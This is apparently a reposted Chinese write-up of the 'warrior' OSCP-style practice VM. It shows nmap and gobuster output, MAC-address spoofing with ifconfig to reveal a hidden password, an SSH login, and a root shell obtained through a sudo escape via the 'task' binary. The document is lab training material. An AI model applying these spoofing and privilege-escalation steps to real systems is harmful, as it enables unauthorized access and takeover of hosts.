【OSCP】warrior

OSCP 靶场

靶场介绍

warrior

easy

信息收集、mac 地址修改、task 提权

信息收集

主机发现

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.70 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-15 03:13 EST
Nmap scan report for 192.168.31.70
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 25:16:8d:63:6b:75:f0:59:55:d4:b0:2d:75:8d:e0:e6 (RSA)
|   256 1e:29:d0:f4:c5:95:e7:40:30:2b:35:f7:a3:bc:36:75 (ECDSA)
|_  256 cc:b1:52:b3:d7:ef:cd:73:4c:fc:f6:b5:51:77:ea:f3 (ED25519)
80/tcp open  http    nginx 1.18.0
| http-robots.txt: 7 disallowed entries 
| /admin /secret.txt /uploads/id_rsa /internal.php 
|_/internal /cms /user.txt
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0
MAC Address: 08:00:27:0C:35:AB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt      -u http://192.168.31.70 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.70
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,txt
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.70/index.html           (Status: 200) [Size: 31]
http://192.168.31.70/user.txt             (Status: 200) [Size: 5]
http://192.168.31.70/admin                (Status: 301) [Size: 169] [--> http://192.168.31.70/admin/]
http://192.168.31.70/robots.txt           (Status: 200) [Size: 137]
http://192.168.31.70/internal.php         (Status: 200) [Size: 82]
http://192.168.31.70/secret.txt           (Status: 200) [Size: 17]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

这里有个提示，需要修改mac 地址后才能看到密码

sudo ifconfig eth1 down
sudo ifconfig eth1 hw ether 00:00:00:00:00:af
sudo ifconfig eth1 up
sudo service networking restart
ifconfig

修改后再次访问得到密码

权限获取

这里需要使用提示的bro 账号进行登录。

权限提升

利用task 提权到root 权限

/usr/sbin/sudo /usr/bin/task execute /bin/sh

End

“点赞、在看与分享都是莫大的支持”

原文始发于微信公众号（贝雷帽SEC）：【OSCP】warrior